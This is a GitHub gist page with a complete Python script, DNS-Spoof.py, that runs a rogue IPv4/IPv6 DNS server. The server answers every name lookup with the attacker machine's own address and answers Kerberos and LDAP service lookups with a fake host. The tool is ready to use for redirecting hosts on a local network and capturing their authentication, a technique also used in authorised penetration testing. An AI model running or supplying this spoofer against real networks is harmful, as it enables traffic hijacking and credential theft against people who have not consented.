Skip to content

Instantly share code, notes, and snippets.

@FrankSpierings
Last active June 5, 2021 08:12
Show Gist options
  • Save FrankSpierings/7d8accbffd22df897dc4e33629f7f0d2 to your computer and use it in GitHub Desktop.
Save FrankSpierings/7d8accbffd22df897dc4e33629f7f0d2 to your computer and use it in GitHub Desktop.
DNS-Spoof.py (IPv6 and IPv4)
import socket
import threading
import socketserver
import time
from dnslib import *
import struct
import netifaces
import logging
import logging.config
import json
import argparse
logconfig = json.loads('''{
"version": 1,
"disable_existing_loggers": false,
"formatters": {
"standard": {
"format": "%(levelname)s:%(name)s:%(message)s"
},
"colored": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(asctime)s %(levelname)-8s%(reset)s %(blue)s%(message)s"
}
},
"handlers": {
"default": {
"level": "DEBUG",
"formatter": "colored",
"class": "logging.StreamHandler",
"stream": "ext://sys.stdout"
}
},
"loggers": {
"": {
"handlers": [
"default"
],
"level": "DEBUG",
"propagate": true
}
}
}''')
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
self.logger = logging.getLogger(self.__class__.__name__)
size = self.request.recv(2)
size = struct.unpack('>H', size)[0]
data = self.request.recv(size)
reply = dns_reply(self, data)
reply = reply.pack()
reply = struct.pack('>H', len(reply)) + reply
self.request.sendall(reply)
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
self.logger = logging.getLogger(self.__class__.__name__)
data = self.request[0]
reply = dns_reply(self, data)
reply = reply.pack()
self.request[1].sendto(reply, self.client_address)
def dns_reply(self, data):
self.logger.debug('{0} Raw query:\n{1}'.format(self.client_address[0], data))
query = DNSRecord.parse(data)
self.logger.info('{0} Query:\n{1}'.format(self.client_address[0], query))
reply = query.reply()
for q in query.questions:
# self.logger.debug('Question: {0}'.format(q))
if q.qtype == QTYPE.A:
if ANSWER_A is not None:
reply.add_answer(RR(str(q.qname),QTYPE.A,rdata=A(ANSWER_A)))
elif q.qtype == QTYPE.AAAA:
if ANSWER_AAAA is not None:
reply.add_answer(RR(str(q.qname),QTYPE.AAAA,rdata=AAAA(ANSWER_AAAA)))
elif q.qtype == QTYPE.ANY:
if ANSWER_A is not None:
reply.add_answer(RR(str(q.qname),QTYPE.A,rdata=A(ANSWER_A)))
if ANSWER_AAAA is not None:
reply.add_answer(RR(str(q.qname),QTYPE.AAAA,rdata=AAAA(ANSWER_AAAA)))
elif q.qtype == QTYPE.SRV:
port = 0
if str(q.qname).startswith('_kerberos'):
port = 88
elif str(q.qname).startswith('_ldap'):
port = 389
else:
port = 0
reply.add_answer(RR(str(q.qname),QTYPE.SRV,rdata=SRV(weight=1000, priority=0, port=port, target='fake.local')))
else:
pass
self.logger.info('{0} Reply:\n{1}'.format(self.client_address[0], reply))
return reply
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
address_family = socket.AF_INET6
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
address_family = socket.AF_INET6
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Spoof DNS replies')
parser.add_argument('interface', help='Interface to listen on')
parser.add_argument('-p', dest='port', type=int, default=53, help='Port to listen on')
args = parser.parse_args()
logging.config.dictConfig(logconfig)
logger = logging.getLogger()
HOST = ""
PORT = args.port
servers = [ ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler),
ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)]
ANSWER_A = None
ANSWER_AAAA = None
try:
ANSWER_A = netifaces.ifaddresses(args.interface)[netifaces.AF_INET][0]['addr']
except:
pass
try:
ANSWER_AAAA = netifaces.ifaddresses(args.interface)[netifaces.AF_INET6][0]['addr'].split('%')[0]
except:
pass
logger.info("Ipv4 Address: {0}".format(ANSWER_A))
logger.info("Ipv6 Address: {0}".format(ANSWER_AAAA))
for server in servers:
ip, port = server.server_address[:2]
server.allow_reuse_address = True
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
logger.info('CTRL+C to end')
try:
while True:
time.sleep(1)
except: # KeyboardInterrupt:
pass
for server in servers:
server.shutdown()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment